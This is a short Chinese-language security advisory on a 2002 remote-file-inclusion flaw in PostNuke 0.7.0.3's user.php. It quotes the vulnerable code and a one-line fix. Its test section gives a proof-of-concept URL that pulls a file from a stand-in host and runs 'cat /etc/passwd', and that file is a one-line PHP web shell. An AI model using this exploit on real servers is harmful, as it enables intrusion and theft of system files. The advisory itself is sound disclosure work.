postnuke v 0.7.0.3远程命令可执行漏洞发布时间:2002-03-29 更新时间:2002-03-29 严重程度:高 威胁程度:普通用户访问权限 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 postnuke v 0.7.0.3详细描述 postnuke是内容管理系统,其中user.php的107行存在漏洞可以允许用户提供任意值给$caselist值,导致任意命令可执行,问题代码如下: foreach ($caselist as $k=>$v) { $ModName = $v['module']; include "$v[path]/$k"; } $caselist = array(); 测试代码 http://lame_host/user.php?caselist[bad_file.txt][path] =http://bad_host&command=cat%20/etc/passwd bad_fiel.txt如下(把其放到bad_host文档目录中): -- start bad_file.txt ----- <pre> <?php system($command); ?> -- end bad_file.txt ----- 解决方案 在28行放入如下代码: $caselist = array(); 相关信息 pokleyzz sakamaniaka (pokleyzz@hotmail.com) 参考:http://archives.neohapsis.com/archives/bugtraq/2002-03/0345.html 相关主页:www.postnuke.org |
